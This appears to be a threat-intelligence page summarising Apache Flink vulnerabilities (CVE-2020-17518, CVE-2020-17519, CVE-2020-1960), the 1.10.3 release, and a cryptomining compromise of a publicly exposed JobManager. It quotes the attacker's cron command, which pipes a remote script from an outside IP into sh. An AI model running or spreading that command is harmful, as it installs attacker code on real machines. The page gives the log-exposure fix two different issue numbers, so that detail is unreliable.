Apache Flink maintainers documented and remediated multiple security issues, highlighting CVE-2020-17518, a directory traversal vulnerability that allowed remote file writing through the REST API, alongside CVE-2020-1960 and CVE-2020-17519. The project’s new security guidance listed affected versions, fix references, and recommended upgrades, while also clarifying that execution of user-supplied code in Flink clusters is expected behavior rather than a standalone remote code execution flaw. Separately, Flink fixed FLINK-19523 to stop sensitive command-line configuration values from being exposed in JobManager logs, with the change released in versions 1.10.3, 1.11.3, and 1.12.0.
The security fixes drove preparation of the Flink 1.10.3 bugfix release, with developers agreeing to backport the CVE-2020-17518 patch to the 1.10 branch while noting that CVE-2020-17519 did not affect 1.10 because it was introduced in 1.11.0. Later user reports of cryptomining on an internet-exposed Flink server did not point to a new vulnerability; maintainers said the known CVEs were already fixed in 1.12.2-rc2 and stressed that exposing the JobManager web port 8081 publicly is dangerous because Flink’s REST endpoint lacks authentication by default in some modes, enabling arbitrary JAR submission. The project strongly advised keeping Flink processes off the public internet and restricting cluster access to trusted internal or cloud networks.

Map this exposure pattern across your cloud, code, and identities.
9 events from the most recent confirmed update back to the earliest known activity.
In response to the cryptomining report, Flink participants said the behavior did not confirm a new Flink vulnerability and noted that CVE-2020-1960, CVE-2020-17518, and CVE-2020-17519 were already fixed in 1.12.2-rc2 with no regression. They pointed instead to insecure exposure of port 8081 and the lack of default authentication on the REST endpoint, which can allow arbitrary JAR submission in session mode.
A user reported that a newly installed server running a self-compiled Flink 1.12.2-rc2 instance was compromised after exposing JobManager port 8081 to the public internet, with a cron job repeatedly executing 'curl http://195.3.146.118/spr.sh | sh'. The user said they had seen a similar issue previously with Flink 1.10.
Xintong Song said the CVE-2020-17518 fix had already been ported to the Flink 1.10 branch and that the build was stable enough for a release candidate to be prepared. He also volunteered to manage the 1.10.3 release.
During the 1.10.3 release discussion, Yu Li stated that CVE-2020-17519 was introduced in Flink 1.11.0 and therefore did not need to be fixed in 1.10.3, while CVE-2020-17518 did need to be included for the 1.10 branch.
Apache Flink developers opened discussion on a 1.10.3 bugfix release for the 1.10 branch, citing 55 unreleased commits, important bug fixes, and security fixes as reasons to ship it. The proposal initially considered backporting both CVE-2020-17518 and CVE-2020-17519.
Apache Flink added a security page listing fixed vulnerabilities including CVE-2020-1960, CVE-2020-17518, and CVE-2020-17519, with affected versions and recommended upgrade targets. The page also warned that Flink executes user-supplied code by design and strongly discouraged exposing Flink processes to the public internet.
Apache published an advisory for CVE-2020-17518 describing a directory traversal issue that allowed remote file writing through the Flink REST API.
The Apache Software Foundation published CVE-2020-1960 for an Apache Flink vulnerability affecting versions 1.1.0 through 1.10.0. When JMXReporter is enabled with a configured reporter port, a local attacker with machine and JMX port access can rebind the JMXRMI registry to perform a man-in-the-middle attack and extract credentials or other JMX-transmitted data.
Apache Flink fixed an issue where JobManager startup logs could expose sensitive command-line configuration values such as secrets. The fix was tracked as FLINK-30943 and released in versions 1.10.3, 1.11.3, and 1.12.0.
Vulnerabilities, threat actors, malware, products, organizations, breaches, and observables Mallory has linked to this story. Indicator values are masked here and available in full in the app.
Indicator values are masked on this page. See the values in Mallory Domains, IPs, hashes, and URLs are exportable to your SIEM.
See where this exposure pattern shows up across your cloud, code, supply chain, and non-human identities.
8 references tracked. Mallory keeps watching after this page renders.
cve.mitre.org
Open sourcelists.apache.org
Open sourcelists.apache.org
Open sourcelists.apache.org
Open sourceissues.apache.org
Open sourcelists.apache.org
Open sources.apache.org
Open sourceissues.apache.org
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.